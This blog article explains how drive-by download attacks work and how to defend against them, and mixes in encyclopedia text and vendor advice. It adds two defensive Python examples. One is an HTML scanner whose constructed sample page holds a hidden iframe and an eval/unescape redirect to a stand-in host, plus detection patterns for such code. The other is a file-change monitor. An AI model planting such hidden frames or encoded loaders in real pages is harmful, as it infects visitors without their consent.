How A Drive by Download Attack


Warning: At the request of readers of the blog [LAAHB] for articles in English, on this occasion the [LAAHB] admin has written this article in English, so if there are still some readers who don't understand, please translate it using the Google Translate tool that we have provided. Thank you!

Best regards, Team Learning All About Hacks Blog — [LAAHB]

Drive-by download attacks specifically refer to malicious programs that install on your devices without your consent. This also includes unintentional downloads of any files or bundled software onto a computer device.

Masked in all corners of the web, these attacks cause even perfectly legitimate sites to spread this threat.

Here are the two main variants of drive-by download attacks:
  • Non-malicious potentially unwanted programs or applications (PUPs/PUAs).
  • Malware-loaded attacks.
While the former is generally harmless, at its worst it is adware. Cybersecurity experts use the latter as their definition of a drive-by download.

What is a Drive by Download Attack?

A drive-by download attack refers to the unintentional download of malicious code to your computer or mobile device that leaves you open to a cyberattack. You don't have to click on anything, press download, or open a malicious email attachment to become infected.

A drive-by download can take advantage of an app, operating system, or web browser that contains security flaws due to unsuccessful updates or lack of updates. Unlike many other types of cyberattack, a drive-by doesn't rely on the user to do anything to actively enable the attack.

Drive-by download means two things, each concerning the unintended download of computer software from the Internet:

  1. Downloads which a person has authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).
  2. Any download that happens without a person's knowledge, often a computer virus, spyware, malware, or crimeware.
Drive-by downloads may happen when visiting a website, opening an e-mail attachment, clicking a link, or clicking on a deceptive pop-up window, for example clicking on the window in the mistaken belief that an error report from the computer's own operating system is being acknowledged, or that a seemingly innocuous advertisement pop-up is being dismissed.

In such cases, the "supplier" may claim that the user "consented" to the download, although the user was in fact unaware of having started an unwanted or malicious software download.

Similarly, if a person visits a site with malicious content, the person may become the victim of a drive-by download attack.

That is, the malicious content may be able to exploit vulnerabilities in the browser or plugins to run malicious code without the user's knowledge.

A drive-by install (or installation) is a similar event. It refers to installation rather than download (though sometimes the two terms are used interchangeably).

When creating a drive-by download, an attacker must first create their malicious content to perform the attack. With the rise in exploit packs that contain the vulnerabilities needed to carry out drive-by download attacks, the skill level needed to perform this attack has been reduced.

The next step is to host the malicious content that the attacker wishes to distribute. One option is for the attacker to host the malicious content on their own server.

However, because of the difficulty of directing users to a new page, it may also be hosted on a compromised legitimate website, or on a legitimate website that unknowingly distributes the attacker's content through a third-party service (e.g. an advertisement).

When the content is loaded by the client, the attacker will analyze the fingerprint of the client in order to tailor the code to exploit vulnerabilities specific to that client.

Finally, the attacker exploits the necessary vulnerabilities to launch the drive-by download attack. Drive-by downloads usually use one of two strategies. The first strategy is exploiting API calls for various plugins.

For example, the DownloadAndInstall API of the Sina ActiveX component did not properly check its parameters and allowed the downloading and execution of arbitrary files from the internet.

The second strategy involves writing shellcode to memory, and then exploiting vulnerabilities in the web browser or plugin to divert the control flow of the program to the shellcode.

After the shellcode has been executed, the attacker can perform further malicious activities. This often involves downloading and installing malware, but can be anything, including stealing information to send back to the attacker.

The attacker may also take measures to prevent detection throughout the attack. One method is to rely on the obfuscation of the malicious code. This can be done through the use of IFrames.

Another method is to encrypt the malicious code to prevent detection. Generally the attacker encrypts the malicious code into a ciphertext, then includes the decryption method after the ciphertext.

Detection of drive-by download attacks is an active area of research. Some methods of detection involve anomaly detection, which watches for state changes on a user's computer system while the user visits a webpage.

This involves monitoring the user's computer system for anomalous changes when a web page is rendered. Other methods of detection include detecting when malicious code (shellcode) is written to memory by an attacker's exploit.

Another detection method is to make run-time environments that allow JavaScript code to run and track its behavior while it runs. Other detection methods include examining contents of HTML pages to identify features that can be used to identify malicious web pages, and using characteristics of web servers to determine if a page is malicious.

Some antivirus tools use static signatures to match patterns of malicious scripts, although these are not very effective because of obfuscation techniques. Detection is also possible by using low-interaction or high-interaction honeyclients.
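The evasion techniques described above (hidden IFrames that pull in attacker content, and an encoded payload followed by its decoder) leave static traces in the page markup, which is what the "examining contents of HTML pages" style of detection looks for. The following is an added example, not code from the original article or from any product it mentions: a small triage scanner that parses a page, flags iframes a user could not see, and flags inline scripts that pair a decoder call with one long string literal. The sample page, the decoder list, the 64-character threshold and the off-screen heuristic are constructed assumptions.

```python
"""Static triage of an HTML page for drive-by landing indicators.

Added example (not code from the original article): it looks for hidden
IFrames and for inline scripts of the "ciphertext then decoder" shape.
Thresholds and the sample page are constructed assumptions.
"""
import math
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed sample page: a normal CDN script and ad frame, then a 0x0
# hidden frame and a script whose encoded string is decoded and eval'd.
_ENCODED = "".join(f"%{b:02x}" for b in b"window.location='http://203.0.113.10/land.php'")
SAMPLE_HTML = (
    "<html><body><h1>Welcome</h1>\n"
    '<script src="https://cdn.example.com/app.js"></script>\n'
    '<iframe src="https://ads.example.net/banner" width="300" height="250"></iframe>\n'
    '<iframe src="http://203.0.113.10/land.php" width="0" height="0" '
    'style="visibility:hidden"></iframe>\n'
    f'<script>var p="{_ENCODED}";eval(unescape(p));</script>\n'
    "</body></html>\n"
)

# Functions that turn an encoded string literal back into executable code.
DECODERS = re.compile(r"\b(eval|unescape|atob|Function|String\.fromCharCode)\s*\(")
LITERAL = re.compile(r"(['\"])(.*?)\1", re.S)


class _Collector(HTMLParser):
    """Collect iframe attribute maps and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:  # external <script src> has no body and is skipped
                self.scripts.append(body)


def _dimension(value):
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def is_hidden_iframe(attrs):
    """True for frames a user could not see: 0/1 px, hidden, or off-screen."""
    style = attrs.get("style", "").replace(" ", "").lower()
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return re.search(r"(left|top):-\d{3,}", style) is not None  # pushed off-screen


def shannon_entropy(text):
    """Bits per character; reported so an analyst can compare literals."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def script_indicators(body, min_literal=64):
    """A decoder call plus one long string literal is the classic packed shape."""
    decoders = sorted(set(DECODERS.findall(body)))
    longest = max((m.group(2) for m in LITERAL.finditer(body)), key=len, default="")
    return {
        "decoders": decoders,
        "longest_literal": len(longest),
        "literal_entropy": round(shannon_entropy(longest), 2),
        "suspicious": bool(decoders) and len(longest) >= min_literal,
    }


def scan_html(html):
    """Return (indicator, detail) pairs for everything worth a human look."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    findings = [("hidden_iframe", a.get("src", "")) for a in parser.iframes if is_hidden_iframe(a)]
    for body in parser.scripts:
        ind = script_indicators(body)
        if ind["suspicious"]:
            findings.append(("obfuscated_script", ",".join(ind["decoders"])))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run against the constructed page it reports the 0x0 frame and the eval/unescape script while leaving the visible ad frame and the external CDN script alone. This is triage, not a verdict: legitimate minifiers also produce long literals, and real obfuscators vary the decoder names, which is exactly why the text calls static signatures weak on their own and pairs them with behavioural methods such as honeyclients.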

Drive-by downloads can also be prevented from occurring by using script-blockers such as NoScript, which can easily be added into browsers such as Firefox. Using such a script-blocker, the user can disable all the scripts in a given webpage, and then selectively re-enable individual scripts on a one-by-one basis in order to determine which ones are truly necessary for webpage functionality.

In this way, a whitelist of acceptable scripts can quickly be developed, which in turn facilitates convenient, safe, and efficient browsing of other websites. Such script-blocking also saves time and bandwidth (hence money) for the user, because scripts that load advertising (especially targeted ads) and invade the user's privacy (via tracking and profiling) no longer constitute a personal drain on the user and his/her resources.


Drive by downloads are designed to breach your device for one or more of the following:
  1. Hijack your device — to build a botnet, infect other devices, or breach yours further.
  2. Spy on your activity — to steal your online credentials, financial info, or identity.
  3. Ruin data or disable your device — to simply cause trouble or personally harm you.
Without proper security software or fixes for your vulnerabilities, you could become a victim of a drive by download attack.

How Do Drive by Download Attacks Work?

If you’ve ever asked yourself, “what is a drive by download attack?” you’re more aware than most. Since they infiltrate so quietly even on “safe sites,” most people have no clue how they got infected.

There are two main ways malicious drive by downloads get into your devices:
  1. Authorized without knowing full implications: You take an action leading to infection, such as clicking a link on a deceptive fake security alert or downloading a Trojan.
  2. Fully unauthorized without any notification: You visit a site and get infected without any prompts or further action. These downloads can be anywhere, even legitimate sites.
Knowing exactly what a drive-by download is matters as much as knowing how to spot bait for an attack. Let's unpack each of these methods to help you see possible red flags.

Authorized Downloads with Hidden Payloads

Authorized drive by downloads are streamlined and may even be spotted before the attack:
  • Hacker creates a vector for malware delivery — online message, ads, legitimate program downloads.
  • You interact with the vector — clicking a deceptive link, downloading software, etc.
  • Malware installs on your device — by failing to opt-out of extra software or arriving at a malware-infested site.
  • Hacker successfully enters your device — malware takes unwanted control of your data.
Software or websites may seem innocuous, but they are corrupted by malware. In fact, one of the greatest dangers is the ease of attracting visitors to sites or apps that seem innocent.

For example, you might get a link emailed to you or a post on your social media feed. It is masked to look as though it was sent from sources you trust. This social engineering tactic is used to entice you to click and open. Once the website is open, the drive-by download installs itself on your computer or mobile device.

Bundleware is a popular “authorized” method, using secondary programs attached to your actual desired program download. Sometimes called barnacles, these potentially unwanted programs/applications (PUPs/PUAs) can conceal malware or be malware themselves. You’ll find this software usually as an opt-out choice when downloading free software or shareware.

Phishing can also be used to bait you into a drive-by download. Popups or fraudulent online messages pose as organizations you know and trust. You might be seeing a fake security breach notification from your web browser, or a fake data breach email from your bank. These are meant to scare you into clicking a link or downloading an attachment — and getting infected.

Unauthorized Downloads Without Your Knowledge

An unauthorized drive by download works in a simple way despite having multiple phases:
  1. Hacker compromises a web page — plugging a malicious component into a security flaw.
  2. You trigger the component — visiting the page and it finds your device’s security gaps.
  3. The component downloads malware to your device — via your exploited security.
  4. Malware does its job — letting the hacker disrupt, control, or steal from your device.
As noted above, unauthorized malicious code is distributed directly by compromised websites. However, the code is placed there by hackers. Their methods rely on natural flaws of digital technology, as well as unsafe security practices.

Exploit kits are the software used to compromise vulnerable web servers and your devices. These kits identify software vulnerabilities on machines and web browsers to determine which systems are easy to obtain. Exploit kits often use small pieces of code designed to slip past simple defenses and go largely unnoticed. The code is kept simple to focus on one job: to contact another computer to introduce the rest of the code it needs to access a mobile device or computer.

Security vulnerabilities discovered by exploit kits are unavoidable in the digital age. No software or hardware can ever be made perfect. Just like a building can be infiltrated with careful study and planning, so too can any software, network, or other digital infrastructure. Vulnerabilities come in a few common forms:
  • Zero-day exploits: Security flaws without any known fixes or patches.
  • Known exploits: Security issues that have known-but-uninstalled fixes.
Zero-day exploits are hard to avoid, but known issues are manipulated purely due to poor cybersecurity practices. If endpoint users and web admins fail to update all their software in a timely fashion, they will delay vital security updates as well — and this is what hackers rely on.

Drive by downloads are by far one of the harder threats to prevent. Without proper attention to detail and strong security at all touchpoints, web activity becomes far more hazardous.

How to Avoid Drive by Download Attacks

As with many aspects of cyber safety, the best defense is caution. You should never take your security for granted. Here at Kaspersky, we’ve compiled some of the best guidelines on how you can avoid downloading malicious code.

How Website Owners Can Prevent Drive by Downloads

As a website owner, you are the first line of defense against hackers that target your users. To give yourself and your users peace of mind, strengthen your infrastructure with these tips:
  1. Keep all website components up to date. This includes any themes, addons, plugins, or any other infrastructure. Each update likely has new security fixes to keep hackers out.
  2. Remove any outdated or unsupported components of your website. Without regular security patches, old software is perfect for fraudsters to study and exploit.
  3. Use strong passwords and usernames for your admin accounts. Brute force attacks give hackers an almost instant break-in for default passwords, or weak ones like “password1234.” Use a password generator alongside a password manager to stay safe.
  4. Install protective web security software into your site. Monitoring software will help keep watch for any malicious changes to your site’s backend code.
  5. Consider how your advertisement use might affect users. Advertisements are a popular vector for drive by downloads. Be sure your users aren’t getting recommended suspect advertisements.
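Tip 4 above (watch for malicious changes to the site's backend code) and the anomaly-detection approach described earlier (watch a system for unexpected state changes while a page is handled) rest on the same mechanism: record a known-good baseline, then compare. The following is an added example, not code from the original article or from any product it mentions, implementing that snapshot-and-diff check in plain Python. The directory layout, file contents, the injected snippet and the marker keyword list are constructed for the demonstration; in practice the baseline is taken at deploy time and stored somewhere the web server cannot write.

```python
"""Snapshot-and-diff change detection for a directory tree.

Added example, not code from the original article. Baseline a tree,
re-hash it later, report added/removed/modified files, and give changed
files containing crude injection markers a first look. Everything in
demo() is constructed.
"""
import hashlib
import json
import os
import tempfile

# Crude triage strings (constructed list, not exhaustive): a changed file
# containing one of these deserves a closer look before anything else.
MARKERS = ("<iframe", "eval(", "unescape(", "fromCharCode(", "base64_decode(")


def snapshot(root):
    """Map each regular file under root (relative, '/'-separated) to its SHA-256."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            state[rel] = digest.hexdigest()
    return state


def diff(baseline, current):
    """Return sorted lists (added, removed, modified) of relative paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, removed, modified


def triage(root, paths):
    """Return the subset of paths whose content contains a MARKERS string."""
    flagged = []
    for rel in paths:
        with open(os.path.join(root, rel), "rb") as fh:
            text = fh.read().decode("utf-8", "replace")
        if any(marker in text for marker in MARKERS):
            flagged.append(rel)
    return flagged


def save_baseline(state, path):
    """Persist the baseline off the watched tree (JSON, stable ordering)."""
    with open(path, "w") as fh:
        json.dump(state, fh, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def demo():
    """Baseline a tiny constructed site, simulate a compromise, report changes."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        theme_dir = os.path.join(root, "themes", "site")
        os.makedirs(theme_dir)
        footer = os.path.join(theme_dir, "footer.php")
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write("<html><body>Hello</body></html>\n")
        with open(footer, "w") as fh:
            fh.write("<footer>ok</footer>\n")
        baseline_path = os.path.join(store, "baseline.json")  # outside the tree
        save_baseline(snapshot(root), baseline_path)

        # Simulated compromise (constructed): the theme footer gains a hidden
        # frame and an unknown file appears next to the theme directory.
        with open(footer, "a") as fh:
            fh.write('<iframe src="http://203.0.113.10/x" width="0" height="0"></iframe>\n')
        with open(os.path.join(root, "themes", "u.php"), "w") as fh:
            fh.write("<?php /* unknown file */ ?>\n")

        added, removed, modified = diff(load_baseline(baseline_path), snapshot(root))
        return {
            "added": added,
            "removed": removed,
            "modified": modified,
            "flagged": triage(root, added + modified),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The diff is the signal; the marker check only orders the reading list, since a new file with no markers (the `u.php` in the demo) still needs explaining. Re-run the snapshot after every legitimate deploy so that the baseline tracks the site, otherwise every update looks like a compromise.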

7 Tips for Endpoint Users

As a user, you’ll have to rely more on the various security features offered in your software. You can follow these tips to prepare yourself and your software against a drive by download attack:
  1. Only use your computer's admin account for program installations. Admin privileges are necessary for drive-by downloads to install without your consent. Since your main account has admin privileges by default, use a secondary non-admin account for daily use.
  2. Keep your web browser and operating system up to date. New patches help seal gaps in their defenses where drive-by-download code could burrow in. Do not wait or delay — install these updates as soon as they release.
  3. Be wary of keeping too many unnecessary programs and apps. The more plug-ins you have on your device, the more susceptible you are to infection. Only keep the software you trust and use often. Also, remove any older apps that no longer receive updates.
  4. Use an internet security software solution on all your devices. Products like Kaspersky Security Cloud automatically keep your malware definitions up-to-date to spot the latest threats. They also can scan websites proactively to block known compromised sites.
  5. Always avoid websites that may contain malicious code. Sites that offer file-sharing or mature content are common points of infection. Only visit mainstream sites you normally use or at least well-established sites to improve your chances of staying clean.
  6. Carefully read and examine security popups on the web before clicking. Scammers use deceptive popup ads on desktop and mobile browsers that look like legitimate alerts. To avoid being linked to an attack site, watch for typos, odd grammar, and grainy images.
  7. Use an ad-blocker. Drive-by download attacks often use online ads to upload infections. Using an ad blocker can help reduce your exposure to this type of attack.